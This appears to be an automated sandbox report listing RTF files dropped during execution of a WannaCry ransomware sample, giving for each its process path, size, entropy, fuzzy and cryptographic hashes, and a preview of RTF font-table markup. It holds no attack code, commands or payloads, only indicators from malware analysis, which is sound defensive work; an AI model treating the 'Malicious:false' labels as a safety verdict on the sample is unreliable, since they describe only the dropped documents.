                                                                                      Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}..{\f53\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}\'b1\'bc\'b8\'b2\'c3\'bc;}{\f54\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}@\'b1\'bc\'b8\'b2\'c3\'bc;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\fhim
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                      Category:dropped
                                                                                      Size (bytes):37580
                                                                                      Entropy (8bit):5.0458193216786
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:Sw3BHSj2cLeT+sPzy3EFHjHdi2MG2AGsi6p07i/eo75Y3kmA31dv61QyR:Sw3BHSWjHdGG2Axa7iGZrS14N
                                                                                      MD5:08B9E69B57E4C9B966664F8E1C27AB09
                                                                                      SHA1:2DA1025BBBFB3CD308070765FC0893A48E5A85FA
                                                                                      SHA-256:D8489F8C16318E524B45DE8B35D7E2C3CD8ED4821C136F12F5EF3C9FC3321324
                                                                                      SHA-512:966B5ED68BE6B5CCD46E0DE1FA868CFE5432D9BF82E1E2F6EB99B2AEF3C92F88D96F4F4EEC5E16381B9C6DB80A68071E7124CA1474D664BDD77E1817EC600CB4
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}..{\f53\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}\'b1\'bc\'b8\'b2\'c3\'bc;}{\f54\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}@\'b1\'bc\'b8\'b2\'c3\'bc;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                      Category:dropped
                                                                                      Size (bytes):38377
                                                                                      Entropy (8bit):5.030938473355282
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:SheftipUENLFsPzy3EFHjHdg2oG2l1glOmeo75Y3kmA31dv61QyB:Shef3jHdMG2l1AO3ZrS14l
                                                                                      MD5:35C2F97EEA8819B1CAEBD23FEE732D8F
                                                                                      SHA1:E354D1CC43D6A39D9732ADEA5D3B0F57284255D2
                                                                                      SHA-256:1ADFEE058B98206CB4FBE1A46D3ED62A11E1DEE2C7FF521C1EEF7C706E6A700E
                                                                                      SHA-512:908149A6F5238FCCCD86F7C374986D486590A0991EF5243F0CD9E63CC8E208158A9A812665233B09C3A478233D30F21E3D355B94F36B83644795556F147345BF
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                      Category:dropped
                                                                                      Size (bytes):38437
                                                                                      Entropy (8bit):5.031126676607223
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:SheftipUENLFsPzy3EFHjHdtW2IG2sjqMeo75Y3kmA31dv61Qyg:Shef3jHd0G2smJZrS14M
                                                                                      MD5:4E57113A6BF6B88FDD32782A4A381274
                                                                                      SHA1:0FCCBC91F0F94453D91670C6794F71348711061D
                                                                                      SHA-256:9BD38110E6523547AED50617DDC77D0920D408FAEED2B7A21AB163FDA22177BC
                                                                                      SHA-512:4F1918A12269C654D44E9D394BC209EF0BC32242BE8833A2FBA437B879125177E149F56F2FB0C302330DEC328139B34982C04B3FEFB045612B6CC9F83EC85AA9
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                      Category:dropped
                                                                                      Size (bytes):37181
                                                                                      Entropy (8bit):5.039739267952546
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:SheftipUENLFsPzy3EFHjHdN26G2VSA1Ieo75Y3kmA31dv61QyU:Shef3jHdfG2oe1ZrS14w
                                                                                      MD5:3D59BBB5553FE03A89F817819540F469
                                                                                      SHA1:26781D4B06FF704800B463D0F1FCA3AFD923A9FE
                                                                                      SHA-256:2ADC900FAFA9938D85CE53CB793271F37AF40CF499BCC454F44975DB533F0B61
                                                                                      SHA-512:95719AE80589F71209BB3CB953276538040E7111B994D757B0A24283AEFE27AADBBE9EEF3F1F823CE4CABC1090946D4A2A558607AC6CAC6FACA5971529B34DAC
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                      Category:dropped
                                                                                      Size (bytes):49044
                                                                                      Entropy (8bit):4.910095634621579
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:SheftipUENLFsPzy3EFHjHdc2oG2WWDFFG5BwKeo75Y3kmA31dv61QyM:Shef3jHdoG2NHG5BwLZrS14Q
                                                                                      MD5:FB4E8718FEA95BB7479727FDE80CB424
                                                                                      SHA1:1088C7653CBA385FE994E9AE34A6595898F20AEB
                                                                                      SHA-256:E13CC9B13AA5074DC45D50379ECEB17EE39A0C2531AB617D93800FE236758CA9
                                                                                      SHA-512:24DB377AF1569E4E2B2EBCCEC42564CEA95A30F1FF43BCAF25A692F99567E027BCEF4AACEF008EC5F64EA2EEF0C04BE88D2B30BCADABB3919B5F45A6633940CB
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                      Category:dropped
                                                                                      Size (bytes):37196
                                                                                      Entropy (8bit):5.039268541932758
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:Sw3BHSj2cLeT+sPzy3EFHjHdY2oG2pq32eo75Y3kmA31dv61Qys:Sw3BHSWjHdUG2pq3nZrS14I
                                                                                      MD5:3788F91C694DFC48E12417CE93356B0F
                                                                                      SHA1:EB3B87F7F654B604DAF3484DA9E02CA6C4EA98B7
                                                                                      SHA-256:23E5E738AAD10FB8EF89AA0285269AFF728070080158FD3E7792FE9ED47C51F4
                                                                                      SHA-512:B7DD9E6DC7C2D023FF958CAF132F0544C76FAE3B2D8E49753257676CC541735807B4BEFDF483BCAE94C2DCDE3C878C783B4A89DCA0FECBC78F5BBF7C356F35CD
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}..{\f53\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}\'b1\'bc\'b8\'b2\'c3\'bc;}{\f54\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}@\'b1\'bc\'b8\'b2\'c3\'bc;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                      Category:dropped
                                                                                      Size (bytes):36883
                                                                                      Entropy (8bit):5.028048191734335
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:SheftipUENLFsPzy3EFHjHdR2AG2c/EnByeo75Y3kmA31dv61Qy9:Shef3jHdJG2cQZrS14R
                                                                                      MD5:30A200F78498990095B36F574B6E8690
                                                                                      SHA1:C4B1B3C087BD12B063E98BCA464CD05F3F7B7882
                                                                                      SHA-256:49F2C739E7D9745C0834DC817A71BF6676CCC24A4C28DCDDF8844093AAB3DF07
                                                                                      SHA-512:C0DA2AAE82C397F6943A0A7B838F60EEEF8F57192C5F498F2ECF05DB824CFEB6D6CA830BF3715DA7EE400AA8362BD64DC835298F3F0085AE7A744E6E6C690511
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                      Category:dropped
                                                                                      Size (bytes):81844
                                                                                      Entropy (8bit):4.85025787009624
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:SXZ0j2cKKwd1lksPzy3EFHjHdI2MG275rQeo75Y3kmA31dv61Qyr:SXZ0qbjHd4G2RNZrS14P
                                                                                      MD5:B77E1221F7ECD0B5D696CB66CDA1609E
                                                                                      SHA1:51EB7A254A33D05EDF188DED653005DC82DE8A46
                                                                                      SHA-256:7E491E7B48D6E34F916624C1CDA9F024E86FCBEC56ACDA35E27FA99D530D017E
                                                                                      SHA-512:F435FD67954787E6B87460DB026759410FBD25B2F6EA758118749C113A50192446861A114358443A129BE817020B50F21D27B1EBD3D22C7BE62082E8B45223FC
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f11\fbidi \fmodern\fcharset128\fprq1{\*\panose 02020609040205080304}MS Mincho{\*\falt ?l?r ??\'81\'66c};}{\f12\fbidi \froman\fcharset129\fprq2{\*\panose 02030600000101010101}\'b9\'d9\'c5\'c1{\*\falt Batang};}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}..{\f44\fbidi \froman\fcharset129\fprq2{\*\panose 020306000001
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                      Category:dropped
                                                                                      Size (bytes):91501
                                                                                      Entropy (8bit):4.841830504507431
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:Shef3jHdUG2NQcbxfSVZiG9jvi3//ZVrMQr7pEKCHSI2DsY78piTDtTa6BxzBwdY:SheiaDq
                                                                                      MD5:6735CB43FE44832B061EEB3F5956B099
                                                                                      SHA1:D636DAF64D524F81367EA92FDAFA3726C909BEE1
                                                                                      SHA-256:552AA0F82F37C9601114974228D4FC54F7434FE3AE7A276EF1AE98A0F608F1D0
                                                                                      SHA-512:60272801909DBBA21578B22C49F6B0BA8CD0070F116476FF35B3AC8347B987790E4CC0334724244C4B13415A246E77A577230029E4561AE6F04A598C3F536C7E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                      Category:dropped
                                                                                      Size (bytes):41169
                                                                                      Entropy (8bit):5.030695296195755
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:SheftipUENLFsPzy3EFHjHdcqH24G2ZN1EDCv3Apb0WD5gYV/S4L3rnzdeo75Y3f:Shef3jHdcMG2NpZrS14F
                                                                                      MD5:C33AFB4ECC04EE1BCC6975BEA49ABE40
                                                                                      SHA1:FBEA4F170507CDE02B839527EF50B7EC74B4821F
                                                                                      SHA-256:A0356696877F2D94D645AE2DF6CE6B370BD5C0D6DB3D36DEF44E714525DE0536
                                                                                      SHA-512:0D435F0836F61A5FF55B78C02FA47B191E5807A79D8A6E991F3115743DF2141B3DB42BA8BDAD9AD259E12F5800828E9E72D7C94A6A5259312A447D669B03EC44
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                      Category:dropped
                                                                                      Size (bytes):37577
                                                                                      Entropy (8bit):5.025836823617116
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:SheftipUENLFsPzy3EFHjHdy2MG2D7mgwroXeo75Y3kmA31dv61Qy5:Shef3jHdGG23KrDZrS14N
                                                                                      MD5:FF70CC7C00951084175D12128CE02399
                                                                                      SHA1:75AD3B1AD4FB14813882D88E952208C648F1FD18
                                                                                      SHA-256:CB5DA96B3DFCF4394713623DBF3831B2A0B8BE63987F563E1C32EDEB74CB6C3A
                                                                                      SHA-512:F01DF3256D49325E5EC49FD265AA3F176020C8FFEC60EB1D828C75A3FA18FF8634E1DE824D77DFDD833768ACFF1F547303104620C70066A2708654A07EF22E19
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                      Category:dropped
                                                                                      Size (bytes):39896
                                                                                      Entropy (8bit):5.048541002474746
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:SheftipUENLFsPzy3EFHjHdD2SG2gA8w8OJ6868jy8/8w8m8T848f8y858l8j8yv:Shef3jHdxG2KhuZrS14G
                                                                                      MD5:E79D7F2833A9C2E2553C7FE04A1B63F4
                                                                                      SHA1:3D9F56D2381B8FE16042AA7C4FEB1B33F2BAEBFF
                                                                                      SHA-256:519AD66009A6C127400C6C09E079903223BD82ECC18AD71B8E5CD79F5F9C053E
                                                                                      SHA-512:E0159C753491CAC7606A7250F332E87BC6B14876BC7A1CF5625FA56AB4F09C485F7B231DD52E4FF0F5F3C29862AFB1124C0EFD0741613EB97A83CBE2668AF5DE
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                      Category:dropped
                                                                                      Size (bytes):37917
                                                                                      Entropy (8bit):5.027872281764284
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:SheftipUENLFsPzy3EFHjHdy2QG2xgk5eo75Y3kmA31dv61QyV:Shef3jHdCG2EZrS14p
